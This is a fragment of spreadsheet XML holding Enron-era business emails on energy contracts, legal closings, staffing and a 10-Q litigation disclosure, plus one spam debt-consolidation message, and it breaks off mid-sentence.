    <t>frozenset({'zeu3rk@msn.com'})</t>
  </si>
  <si>
    <t>Got Debt?                                                   [tsomk]</t>
  </si>
  <si>
    <t xml:space="preserve">   Got debt? We can help using Debt Consolidation!_x000D_
_x000D_
If you owe $4,000 USD or more, consolidate your debt into_x000D_
just 1 payment and let us handle the rest! Wouldn't it be_x000D_
nice to have to worry about just 1 fee instead of half a_x000D_
dozen? We think so too._x000D_
_x000D_
- You do not have to own a home_x000D_
- You do not need another mortgage_x000D_
- No credit checks required_x000D_
- Approval within 10 business days_x000D_
- Available to all US citizens_x000D_
_x000D_
For a FREE, no obligation, consultation, please fill out_x000D_
the form below and return it to us. Paying bills should_x000D_
not be a chore, and your life should be as easy and_x000D_
simple as possible. So take advantage of this great offer!_x000D_
_x000D_
Please note that we deal in unsecured debt, so mortgages_x000D_
and car loans etc. cannot apply. Please enter 'N/A' where_x000D_
appropriate. Work phone can be a secondary/cell number._x000D_
_x000D_
-=-=-=-=-=-=-=-=-=-=-_x000D_
_x000D_
Full Name           :_x000D_
Address             :_x000D_
City                :_x000D_
State               :_x000D_
Zip Code            :_x000D_
Home Phone          :_x000D_
Work Phone          :_x000D_
Best Time to Call   :_x000D_
E-Mail Address      :_x000D_
Estimated Debt Size :_x000D_
_x000D_
-=-=-=-=-=-=-=-=-=-=-_x000D_
_x000D_
Thank You_x000D_
_x000D_
_x000D_
To receive no further offers from our company regarding_x000D_
this matter or any other matter, please reply to this_x000D_
e-mail with the word 'Remove' in the subject line._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
tz3qu</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 08:12:37 -0800 (PST)</t>
  </si>
  <si>
    <t>what do you mean_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Wednesday, November 21, 2001 10:11 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	_x000D_
_x000D_
so can you give me the name of sarah's lawyer?</t>
  </si>
  <si>
    <t>Thu, 10 May 2001 09:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Larry F Campbell/NA/Enron on 05/10/2001 _x000D_
04:39 PM ---------------------------_x000D_
_x000D_
_x000D_
Zarin Imam@EES_x000D_
05/10/2001 01:26 PM_x000D_
To: Larry F Campbell/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: _x000D_
_x000D_
Larry,_x000D_
_x000D_
 YOU ARE THE BEST!   Thank you !   Look at it before you give it out!_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
Thanks_x000D_
_x000D_
Z_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 18:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Information Needed for PRC</t>
  </si>
  <si>
    <t>My supervisor is Ed Mc Michael.</t>
  </si>
  <si>
    <t>Fri, 11 Aug 2000 03:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>ExxonMobil Gas Marketing</t>
  </si>
  <si>
    <t>In preparing for our meeting with Exxon, I have hit a dead end with regards _x000D_
to the "Agreement"  he cites in his fax to us.  I have searched and others as _x000D_
well to no avail.    Therefore,  would you ask Jacobson to fax  you/me  the _x000D_
entire agreement he is referring too because it does not exist in our world.  _x000D_
_x000D_
Thanks!_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Fri, 7 Jul 2000 10:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Rabi De phone interview</t>
  </si>
  <si>
    <t xml:space="preserve">Shirley,_x000D_
_x000D_
Let's act on it._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 07/07/2000 _x000D_
05:07 PM ---------------------------_x000D_
_x000D_
_x000D_
Zimin Lu_x000D_
07/07/2000 01:51 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Rabi De phone interview_x000D_
_x000D_
_x000D_
Vince,_x000D_
_x000D_
We had phone interview with Rabi De.  My impression is good. We should invite _x000D_
him for a formal interview._x000D_
_x000D_
He is a hands on person with wide range of experience ( energy financing, _x000D_
derivatives trading, hedging, etc)._x000D_
He communicates very well and expressed interest in financial engineering &amp; _x000D_
modeling._x000D_
_x000D_
Zimin_x000D_
</t>
  </si>
  <si>
    <t>Wed, 22 Nov 2000 03:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Press Conference-Changed to 2:00</t>
  </si>
  <si>
    <t xml:space="preserve">Steve Kean and Jeff Dasovich_x000D_
_x000D_
_x000D_
_x000D_
	"Katie Kaplan" &lt;kaplan@iepa.com&gt;_x000D_
	11/22/2000 11:12 AM_x000D_
	Please respond to kaplan_x000D_
		 _x000D_
		 To: &lt;kaplan@iepa.com&gt;, &lt;Jeff.Dasovich@enron.com&gt;, _x000D_
&lt;knorton@mcnallytemple.com&gt;, "'John Stout for Reliant'" _x000D_
&lt;john_h_stout@reliantenergy.com&gt;, "'Curtis Keebler at Reliant'" _x000D_
&lt;curtis_l_kebler@reliantenergy.com&gt;, "'Julie @ Edson'" &lt;jmball@ns.net&gt;, _x000D_
"'Paula Hall-Collins'" &lt;paula.hall-collins@williams.com&gt;, "'Marty Wilson'" _x000D_
&lt;mwilson@pstrategies.com&gt;, "'Rob Lamkin'" &lt;rllamkin@seiworldwide.com&gt;, "Karen _x000D_
Edson" &lt;kedson@ns.net&gt;, "Bob Weisenmiller" &lt;rbw@mrwassoc.com&gt;, "Sue Mara" _x000D_
&lt;smara@enron.com&gt;, "Andy Brown" &lt;abb@eslawfirm.com&gt;, "B Brown Andy" _x000D_
&lt;andybrwn@earthlink.net&gt;, "Bob Escalante" &lt;rescalante@riobravo-gm.com&gt;, "Greg _x000D_
Blue" &lt;gtbl@dynegy.com&gt;, "Jack Pigott" &lt;jackp@calpine.com&gt;, "Jan _x000D_
Smutny-Jones" &lt;smutny@iepa.com&gt;, "Joe Ronan" &lt;joer@calpine.com&gt;, "Karen _x000D_
Denne" &lt;kdenne@enron.com&gt;, "Kassandra Gough" &lt;kgough@calpine.com&gt;, "Kristin _x000D_
Vellandi" &lt;kvellandi@pstrategies.com&gt;, "Lynn Lednicky" &lt;lale@dynegy.com&gt;, _x000D_
"McNally Ray" &lt;rmcnally@mcnallytemple.com&gt;, "Richard Hyde" _x000D_
&lt;rwhyde@duke-energy.com&gt;, "Stephanie-Newell" _x000D_
&lt;stephanie-newell@reliantenergy.com&gt;, "Tom Ross" &lt;tross@mcnallytemple.com&gt;, _x000D_
"William Hall" &lt;wfhall2@duke-energy.com&gt;, "Trond Aschehoug" _x000D_
&lt;taschehoug@thermoecotek.com&gt;, "Tony Wetzel" &lt;twetzel@thermoecotek.com&gt;, _x000D_
"Susan J Mara" &lt;Susan_J_Mara@enron.com&gt;, "Steve Ponder" _x000D_
&lt;steve_ponder@fpl.com&gt;, "Steve Iliff" &lt;siliff@riobravo-gm.com&gt;, "Scott Noll" _x000D_
&lt;snoll@thermoecotek.com&gt;, "Roger Pelote" &lt;roger.pelote@williams.com&gt;, "Randy _x000D_
Hickok" &lt;rjhickok@duke-energy.com&gt;, "Paula Soos" _x000D_
&lt;paula_soos@ogden-energy.com&gt;, "Marty McFadden" _x000D_
&lt;marty_mcfadden@ogden-energy.com&gt;, "Kent Fickett" &lt;kfickett@usgen.com&gt;, "Ken _x000D_
Hoffman" &lt;khoffman@caithnessenergy.com&gt;, "Jonathan Weisgall" _x000D_
&lt;jweisgall@aol.com&gt;, "Joe Greco" &lt;joe.greco@uaecorp.com&gt;, "Jim Willey" _x000D_
&lt;elliottsa@earthlink.net&gt;, "Jeff Dasovich" &lt;jdasovic@enron.com&gt;, "Hap Boyd" _x000D_
&lt;rboyd@enron.com&gt;, "Frank DeRosa" &lt;frank.derosa@gen.pge.com&gt;, "Eileen Koch" _x000D_
&lt;eileenk@calpine.com&gt;, "Ed Tomeo" &lt;ed.tomeo@uaecorp.com&gt;, "Duane Nelsen" _x000D_
&lt;dnelsen@gwfpower.com&gt;, "Dean Gosselin" &lt;dean_gosselin@fpl.com&gt;, "Dave _x000D_
Parquet" &lt;dparque@ect.enron.com&gt;, "Curt Hatton" &lt;curt.hatton@gen.pge.com&gt;, _x000D_
"Cody Carter" &lt;cody.carter@williams.com&gt;, "Carolyn Baker" _x000D_
&lt;cabaker@duke-energy.com&gt;, "Bill Woods" &lt;billw@calpine.com&gt;, "Bill Carlson" _x000D_
&lt;wcarlson@wm.com&gt;, "Eric Eisenman" &lt;eric.eisenman@neg.pge.com&gt;_x000D_
		 cc: "Steven Kelly" &lt;steven@iepa.com&gt;, "Susan McCabe" _x000D_
&lt;sfmccabe@mindspring.com&gt;, "Scott Govenar" &lt;sgovenar@govadv.com&gt;, "Ron Tom" _x000D_
&lt;thackbarth@govadv.com&gt;, "Robert Ross" &lt;robbiz@cwo.com&gt;, "Phil Isenberg" _x000D_
&lt;Isenberg@HMOT.com&gt;, "Mike Monagan" &lt;mrmonagan@aol.com&gt;, "Maureen OHaren" _x000D_
&lt;Oharen@HMOT.com&gt;, "Marie Moretti" &lt;marie_moretti@msn.com&gt;, "Hedy Govenar" _x000D_
&lt;hgovenar@acom2.com&gt;, "Delany Hunter" &lt;dhunter@smithandkempton.com&gt;, "Bev _x000D_
Hansen" &lt;bhansen@lhom.com&gt;, "Anne Kelly" &lt;kelly@hnks.com&gt;, "Jenn Paulsen" _x000D_
&lt;paulsen@HMOT.com&gt;, "Jamie Parker" &lt;jparker@HMOT.com&gt;_x000D_
		 Subject: RE: Press Conference-Changed to 2:00_x000D_
_x000D_
Greetings:_x000D_
_x000D_
Due to a conflict in the Governors Press Room our Press conference has been_x000D_
moved to 2:00 on Tuesday.  Please let me know ASAP who will be attending on_x000D_
behalf of your organization._x000D_
Thanks and have a nice Thanksgiving!_x000D_
_x000D_
_x000D_
_x000D_
Katie Kaplan_x000D_
Manager of State Policy Affairs_x000D_
Independent Energy Producers Association_x000D_
(916) 448-9499_x000D_
_x000D_
-----Original Message-----_x000D_
From: Katie Kaplan [mailto:kaplan@iepa.com]_x000D_
Sent: Tuesday, November 21, 2000 4:08 PM_x000D_
To: Jeff.Dasovich@enron.com; Kelli Norton [knorton@mcnallytemple.com]; 'John_x000D_
Stout for Reliant'; 'Curtis Keebler at Reliant'; 'Julie @ Edson'; 'Paula_x000D_
Hall-Collins'; 'Marty Wilson'; 'Rob Lamkin'; Karen Edson; Bob Weisenmiller;_x000D_
Sue Mara; Andy Brown; B Brown Andy; Bob Escalante; Greg Blue; Jack Pigott;_x000D_
Jan Smutny-Jones; Joe Ronan; Karen Denne; Karen Edson; Kassandra Gough;_x000D_
Kristin Vellandi; Lynn Lednicky; McNally Ray; Paula Hall-Collins; Richard_x000D_
Hyde; Rob L. Lamkin; Stephanie-Newell; Tom Ross; William Hall; Trond_x000D_
Aschehoug; Tony Wetzel; Susan J Mara; Steve Ponder; Steve Iliff; Scott Noll;_x000D_
Roger Pelote; Rob Lamkin; Randy Hickok; Paula Soos; Marty McFadden; Lynn_x000D_
Lednicky; Kent Fickett; Ken Hoffman; Jonathan Weisgall; Joe Ronan; Joe_x000D_
Greco; Jim Willey; Jeff Dasovich; Jack Pigott; Hap Boyd; Greg Blue; Frank_x000D_
DeRosa; Eileen Koch; Ed Tomeo; Duane Nelsen; Dean Gosselin; Dave Parquet;_x000D_
Curtis Kebler; Curt Hatton; Cody Carter; Carolyn Baker; Bob Escalante; Bill_x000D_
Woods; Bill Carlson; Eric Eisenman_x000D_
Cc: Jan Smutny-Jones; Steven Kelly; Susan McCabe; Scott Govenar; Ron Tom;_x000D_
Robert Ross; Phil Isenberg; Mike Monagan; Maureen OHaren; Marie Moretti;_x000D_
Kassandra Gough; Hedy Govenar; Delany Hunter; Bev Hansen; Anne Kelly; Jenn_x000D_
Paulsen; Jamie Parker_x000D_
Subject: Press Conference_x000D_
Importance: High_x000D_
_x000D_
Greetings:_x000D_
_x000D_
IEP will be holding a press conference on Tuesday November 28 at 10:30 a.m._x000D_
in the Governors Press room to discuss the importance of long-term fixed_x000D_
(that term is easier to understand than bilateral) contracts._x000D_
_x000D_
IEP will be stressing the importance of the contracts as part of the_x000D_
solution for next summer. Several IEP members have offered (and have_x000D_
continued to offer) long-term fixed contracts at terms under the current_x000D_
retail rate freeze.  We will indicate that the utilities have been hesitant_x000D_
to enter into these contracts due to the uncertain nature of the CPUC.  We_x000D_
will point out that several different independent entities have agreed that_x000D_
long-term contracts are one of the key solutions and that the PUC should act_x000D_
immediately to set a benchmark and in so doing eliminate the reasonableness_x000D_
review that is the main barrier for IOU's not entering into large long-term_x000D_
fixed contracts._x000D_
_x000D_
IEP is also currently working to include other market participants in the_x000D_
Press Conference._x000D_
_x000D_
We would like as many IEP participants as possible at the conference to show_x000D_
that there are several companies who continue to be serious about long-term_x000D_
fixed price contracts. We have already received a couple of responses and if_x000D_
you are interested please let me know ASAP-no later than noon Wednesday- as_x000D_
we are sending out an advisory on Monday._x000D_
_x000D_
Thank you for your attention to this matter._x000D_
_x000D_
Katie Kaplan_x000D_
Manager of State Policy Affairs_x000D_
Independent Energy Producers Association_x000D_
(916) 448-9499_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 6 May 2001 04:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Price Reservations for 5 May RTM and 6 May DAM</t>
  </si>
  <si>
    <t xml:space="preserve">jsavitt@nyiso.com writes to the NYISO_TECH_EXCHANGE Discussion List:_x000D_
_x000D_
The NYISO is reserving hours-beginning 0, 2, 5, and 7-23 in the 5 May 2001_x000D_
real-time market to verify prices._x000D_
Prices in the 6 May 2001 Day-Ahead market are correct._x000D_
Pursuant to ECA-B the NYISO is reserving the following hours at the following_x000D_
external proxy buses:_x000D_
PJM:  1-5, 7_x000D_
OH:    1, 4, 7_x000D_
HQ:    1, 3, 4, 7_x000D_
NE:    0, 1, 4, 7, 17, 18_x000D_
</t>
  </si>
  <si>
    <t>Wed, 26 Apr 2000 02:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: ARISTECH - MAY 2000</t>
  </si>
  <si>
    <t>The release of transport is uneffected by Aristech changing vendors.  The _x000D_
three packages of capacity is ENA's until 5/31.  Plan on the 15000 until then._x000D_
_x000D_
Scott</t>
  </si>
  <si>
    <t>Fri, 2 Jul 1999 01:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Mock</t>
  </si>
  <si>
    <t xml:space="preserve">This is incredible.  The kid was a life long Aggie Fan, makes one trip to _x000D_
Austin and commits to UT.  I think we have finally found the guy to win it _x000D_
all for us (MB).   Also now Chance is saying he will actively recruit for _x000D_
us.  He wants this years class to be better than last years class.  I think a _x000D_
few phone calls to Roy Williams and BJ Johnson.  I can't wait til August.  _x000D_
_x000D_
When are you coming back guy.  Are you ready for some football?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From: "Bruce Rudy/ENRON_DEVELOPMENT" AT ENRON_DEVELOPMENT@CCMAIL on 06/30/99 _x000D_
03:21 AM_x000D_
To: Gerald Nemec@ECT_x000D_
cc:  _x000D_
Subject: Mock_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
G$,_x000D_
_x000D_
How goes it?  So how about Mack Brown?  He still amazes me with recruiting _x000D_
prowess.  Under Mackovic, getting Mock would have been an accident, but I am _x000D_
beginning to expect these recruits to start coming to Texas now.  Help me _x000D_
keep my expectations low!_x000D_
_x000D_
Rude-Dog_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 14 Sep 2001 12:34:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Williston Basin</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Thanks_x000D_
 -----Original Message-----_x000D_
From: 	Cantrell, Rebecca W.  _x000D_
Sent:	Friday, September 14, 2001 11:13 AM_x000D_
To:	Whitt, Mark_x000D_
Subject:	Williston Basin_x000D_
_x000D_
Okay, for WB, it's about $40 million._x000D_
_x000D_
 &lt;&lt; File: WB Fm 2 balance_sheet_assets-other_debits-1999.xls &gt;&gt; _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Whitt, Mark  _x000D_
Sent:	Friday, September 14, 2001 12:04 PM_x000D_
To:	Cantrell, Rebecca W._x000D_
Subject:	RE: Questar Base Gas_x000D_
_x000D_
The counterparty is actually Williston Basin Interstate._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Cantrell, Rebecca W.  _x000D_
Sent:	Friday, September 14, 2001 11:02 AM_x000D_
To:	Whitt, Mark_x000D_
Subject:	Questar Base Gas_x000D_
_x000D_
According to the 1999 Form 2 report, Questar's book cost of base gas is about $98.8 million.  See attached excerpt._x000D_
_x000D_
 &lt;&lt; File: Questar Fm 2 balance_sheet_assets-other_debits-1999.xls &gt;&gt; </t>
  </si>
  <si>
    <t>Sun, 15 Apr 2001 12:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>MARK YOUR LUNCH CALENDARS NOW !_x000D_
_x000D_
You are invited to attend the EWS Brown Bag Lunch Series_x000D_
_x000D_
Featuring:  TIM BATTAGLIA_x000D_
_x000D_
Topic:  Steel Origination_x000D_
_x000D_
Thursday, April 19, 2001_x000D_
11:30 a.m. - 12:30 p.m._x000D_
EB 5 C2</t>
  </si>
  <si>
    <t>Mon, 12 Jun 2000 11:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gia.maisashvili@enron.com'})</t>
  </si>
  <si>
    <t>Regulatory Risk for the second Top 20"</t>
  </si>
  <si>
    <t>Rick and Mark,_x000D_
_x000D_
We have identified the next  20 non-US and non-European assets for regulatory _x000D_
risk review.  Please advise us if we missed any other important assets that _x000D_
come to your mind.  In addition, could you please confirm that we have _x000D_
designated the appropriate EGA professional for each asset? _x000D_
_x000D_
We would like to conclude this phase of review by  July 7th._x000D_
_x000D_
_x000D_
Thank you very much for your help._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Gia and John</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 16:05:35 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: FW: expansion agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Yes.  For the certificate date, we will be consistent with the executed Western agreement and use March 31, 2002._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Miller, Mary Kay  _x000D_
Sent:	Tuesday, May 29, 2001 5:56 PM_x000D_
To:	Lokay, Michelle_x000D_
Cc:	Pavlou, Maria_x000D_
Subject:	Re: FW: expansion agreement_x000D_
_x000D_
I was wondering if we agreed to all of the other changes?  especially a certificate by Dec 2001.  MK_x000D_
_x000D_
_x000D_
From:	Michelle Lokay/ENRON@enronXgate on 05/29/2001 03:49 PM_x000D_
To:	Maria Pavlou/ENRON@enronXgate, Mary Kay Miller/ET&amp;S/Enron@ENRON_x000D_
cc:	 _x000D_
_x000D_
Subject:	FW: expansion agreement_x000D_
_x000D_
Here are the comments from Oneok.  They have already executed this Privileged &amp; Confidential agreement via fax.  What do you guys think?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	cbulf@oneok.com@ENRON [mailto:IMCEANOTES-cbulf+40oneok+2Ecom+40ENRON@ENRON.com] _x000D_
Sent:	Tuesday, May 29, 2001 2:23 PM_x000D_
To:	Lokay, Michelle_x000D_
Subject:	expansion agreement_x000D_
_x000D_
_x000D_
_x000D_
I thought I would send you the agreement with the changes I have made - it's_x000D_
been sent for reviewed and signed by ONEOK and sent via fax to you.(See attached_x000D_
file: TWAGMT.doc)_x000D_
_x000D_
 - TWAGMT.doc &lt;&lt; File: TWAGMT.doc &gt;&gt; _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 07:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'chris.gaffney@enron.com', 'mark.powell@enron.com', 'greg.johnston@enron.com', 'julia.murray@enron.com', 'peter.vecchio@enron.com', 'jeffrey.hodge@enron.com', 'mary.cook@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Blake, Cassels &amp; Graydon</t>
  </si>
  <si>
    <t>Please ensure that no new matters are referred to Blakes without speaking to _x000D_
me or Mark Haedicke first.</t>
  </si>
  <si>
    <t>Mon, 5 Jun 2000 05:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Hawaii - Danno B Closing Documents</t>
  </si>
  <si>
    <t>Suzanne:_x000D_
could you please print out the following:_x000D_
Closing Chceklist_x000D_
Swap confirmation_x000D_
Put Option Agreement_x000D_
Swap Termination Agreement_x000D_
LLC Agreement - Danno II, LLC_x000D_
LLC Agreement - Maui II_x000D_
_x000D_
Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
----- Forwarded by Carol St Clair/HOU/ECT on 06/05/2000 12:51 PM -----_x000D_
_x000D_
	"Jeremy Bryant" &lt;BRYAJ@andrews-kurth.com&gt;_x000D_
	06/02/2000 06:26 PM_x000D_
		 _x000D_
		 To: &lt;alan.quaintance@enron.com&gt;, &lt;brenda.l.funk@enron.com&gt;, _x000D_
&lt;Carol.St.Clair@enron.com&gt;, &lt;charles.delacey@enron.com&gt;, _x000D_
&lt;Clement.abrams@enron.com&gt;, &lt;DAVID.dye@enron.com&gt;, _x000D_
&lt;DEBORAH.culver@enron.com&gt;, &lt;gareth.bahlmann@enron.com&gt;, _x000D_
&lt;ryan.siurek@enron.com&gt;, &lt;tina.livingston@enron.com&gt;, _x000D_
&lt;Trevor.Randolph@enron.com&gt;, &lt;trushar.patel@enron.com&gt;, _x000D_
&lt;mniebruegge@mayerbrown.com&gt;, &lt;tellwood@mayerbrown.com&gt;, _x000D_
&lt;eawilburn@prickett.com&gt;, &lt;Tamullen@prickett.com&gt;, &lt;kenton@rlf.com&gt;, _x000D_
&lt;mercedes.arango@us.cibc.com&gt;, &lt;schottla@us.cibc.com&gt;, _x000D_
&lt;wolfmark@us.cibc.com&gt;, &lt;aroberts@wilmingtontrust.com&gt;_x000D_
		 cc: "David Barbour" &lt;BARBD@andrews-kurth.com&gt;, "CHRIS KRECEK" _x000D_
&lt;KRECC@andrews-kurth.com&gt;, "MURIEL McFARLING" &lt;MCFAM@andrews-kurth.com&gt;, "TOM _x000D_
POPPLEWELL" &lt;POPPT@andrews-kurth.com&gt;, "PAT SARGENT" &lt;SARGP@andrews-kurth.com&gt;_x000D_
		 Subject: Hawaii - Danno B Closing Documents_x000D_
_x000D_
_x000D_
Attached in Word Perfect format are each of the following documents, marked _x000D_
against the previous version circulated:_x000D_
_x000D_
-  Closing Checklist (241028);_x000D_
-  Series Certificate issued to CIBC Inc. (240786);_x000D_
-  Series Supplement (240795);_x000D_
-  Drawdown Request (240796);_x000D_
-  Swap Confirmation (240821);_x000D_
-  Put Option Agreement (240822);_x000D_
-  Assignment of Right to Exercise Put Option (240960);_x000D_
-  Notice of Assignment of Put Option (240961);_x000D_
-  B Interest Assignment Agreement (240996);_x000D_
-  Second Amended and Restated Limited Liability Company Operating Agreement _x000D_
of Danno II, L.L.C. (240998);_x000D_
-  Second Amended and Restated Limited Liability Company Agreement of Maui II _x000D_
(241004);_x000D_
-  Receipt of Transferor (241010);_x000D_
-  Receipt of Trust (241012);_x000D_
-  Independent Auctioneer Letter Agreement (241013);_x000D_
-  Sale and Auction Agreement (241014);_x000D_
-  Consent and Amendment Number One to the ESSO 1 LLC Agreement (243465);_x000D_
-  Notice of Prepayment (242286);_x000D_
-  Receipt of CIBC and CIBC Inc. (241193);_x000D_
-  Direction Letter to Owner Trustee (241207);_x000D_
-  Dissolution Agreement (241211);_x000D_
-  Certificate of Cancellation of LLC Interest Holdings 1 Owner Trust _x000D_
(242274);_x000D_
-  Swap Termination Agreement (241218); and_x000D_
-  Termination of Independent Auctioneer Letter Agreement (241220)._x000D_
_x000D_
The changes in these documents reflect (i) a change in the closing date to _x000D_
June 8, (ii) deletion of the demand note, and (iii) incorporation of comments _x000D_
received to date.  Please let me know as soon as possible if you have any _x000D_
additional comments as the closing is scheduled for next Thursday, June 8._x000D_
_x000D_
The Asset Notice, Asset Summary and Drawdown Request will be delivered on _x000D_
Monday, June 5._x000D_
_x000D_
 - RESULT OF COMPARISON 243465 VER 1.WPD_x000D_
 - RESULT OF COMPARISON 240786 VER 4.WPD_x000D_
 - RESULT OF COMPARISON 240795 VER 4.WPD_x000D_
 - RESULT OF COMPARISON 240796 VER 4.WPD_x000D_
 - RESULT OF COMPARISON 240821 VER 4.WPD_x000D_
 - RESULT OF COMPARISON 240822 VER 4.WPD_x000D_
 - RESULT OF COMPARISON 240960 VER 3.WPD_x000D_
 - RESULT OF COMPARISON 240961 VER 3.WPD_x000D_
 - RESULT OF COMPARISON 240996 VER 3.WPD_x000D_
 - RESULT OF COMPARISON 240998 VER 4.WPD_x000D_
 - RESULT OF COMPARISON 241004 VER 4.WPD_x000D_
 - RESULT OF COMPARISON 241010 VER 4.WPD_x000D_
 - RESULT OF COMPARISON 241012 VER 4.WPD_x000D_
 - RESULT OF COMPARISON 241013 VER 3.WPD_x000D_
 - RESULT OF COMPARISON 241014 VER 4.WPD_x000D_
 - RESULT OF COMPARISON 241193 VER 2.WPD_x000D_
 - RESULT OF COMPARISON 241207 VER 2.WPD_x000D_
 - RESULT OF COMPARISON 241211 VER 2.WPD_x000D_
 - RESULT OF COMPARISON 241218 VER 2.WPD_x000D_
 - RESULT OF COMPARISON 241220 VER 2.WPD_x000D_
 - RESULT OF COMPARISON 242274 VER 1.WPD_x000D_
 - RESULT OF COMPARISON 242286 VER 1.WPD_x000D_
 - 241028_2.WPD</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 03:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Litigation and Other Contingencies Disclosure</t>
  </si>
  <si>
    <t xml:space="preserve"> Yes we won, but no we shouldn't change our response. The Judge sent us a=_x000D_
=20_x000D_
letter with his rulings, but has not signed an official order. In fact ,las=_x000D_
t=20_x000D_
week the judge heard the Plaintiff's motion to reconsider and stated that h=_x000D_
is=20_x000D_
letter was not an order. In light of this, I would leave the description th=_x000D_
e=20_x000D_
same. Your thoughts?_x000D_
_x000D_
_x000D_
_x000D_
=09Rex Rogers@ENRON_x000D_
=0911/03/2000 05:35 PM_x000D_
=09=09_x000D_
=09=09 To: Gary Peng/GPGFIN/Enron@ENRON_x000D_
=09=09 cc: Richard B Sanders/HOU/ECT@ECT_x000D_
=09=09 Subject: Re: Litigation and Other Contingencies Disclosure_x000D_
_x000D_
_x000D_
Richard:  I'm sure I must be wrong about this, but it was my understanding=_x000D_
=20_x000D_
(second-hand hearsay, at best) that the trial court ruled in our favor=20_x000D_
against class certification after remand from the Supreme Court.  If I am=_x000D_
=20_x000D_
indeed incorrect, sorry for wasting your time with this message--just=20_x000D_
disregard.  Thanks, Rex._x000D_
_x000D_
_x000D_
_x000D_
=09Gary Peng_x000D_
=0911/03/2000 05:17 PM_x000D_
=09=09=20_x000D_
=09=09 To: Rex Rogers/Corp/Enron@Enron_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: Re: Litigation and Other Contingencies Disclosure_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Gary Peng/GPGFIN/Enron on 11/03/2000=20_x000D_
05:17 PM ---------------------------_x000D_
From: Richard B Sanders@ECT on 10/23/2000 06:52 AM_x000D_
To: Gary Peng/GPGFIN/Enron@ENRON_x000D_
cc: Charles Cheek/Corp/Enron@Enron, Frank Smith/Corp/Enron@Enron, Jan=20_x000D_
Johnson/GPGFIN/Enron@ENRON, Rex Rogers/Corp/Enron@Enron, Robert=20_x000D_
Eickenroht/Corp/Enron@Enron=20_x000D_
_x000D_
Subject: Re: Litigation and Other Contingencies Disclosure_x000D_
 =20_x000D_
_x000D_
I have no changes to the Intratex case description._x000D_
_x000D_
_x000D_
_x000D_
=09Gary Peng@ENRON_x000D_
=0910/19/2000 06:13 PM_x000D_
=09=09=20_x000D_
=09=09 To: Charles Cheek/Corp/Enron@Enron, Robert Eickenroht/Corp/Enron@Enr=_x000D_
on,=20_x000D_
Richard B Sanders/HOU/ECT@ECT, Frank Smith/Corp/Enron@Enron_x000D_
=09=09 cc: Rex Rogers/Corp/Enron@Enron, Jan Johnson/GPGFIN/Enron@ENRON_x000D_
=09=09 Subject: Litigation and Other Contingencies Disclosure_x000D_
_x000D_
_x000D_
_x000D_
Find below the Litigation and Other Contingencies footnote from the the Jun=_x000D_
e=20_x000D_
30, 2000 Form 10-Q.  Please update the section of the disclosure for which=_x000D_
=20_x000D_
you are responsible for inclusion in the third quarter 2000 Form 10Q .  Als=_x000D_
o,=20_x000D_
please let me know if there are any new items that should be considered._x000D_
_x000D_
Please respond no later than Monday October 30._x000D_
_x000D_
Gary_x000D_
3-6841_x000D_
_x000D_
_x000D_
3.  Litigation and Other Contingencies_x000D_
_x000D_
 Enron is a party to various claims and litigation, the significant items o=_x000D_
f=20_x000D_
which are discussed below.  Although no assurances can be given, Enron=20_x000D_
believes, based on its experience to date and after considering appropriate=_x000D_
=20_x000D_
reserves that have been established, that the ultimate resolution of such=_x000D_
=20_x000D_
items, individually or in the aggregate, will not have a material adverse=_x000D_
=20_x000D_
impact on Enron=01,s financial position or its results of operations._x000D_
_x000D_
 Litigation.  In 1995, several parties (the Plaintiffs) filed suit in Harri=_x000D_
s=20_x000D_
County District Court in Houston, Texas, against Intratex Gas Company=20_x000D_
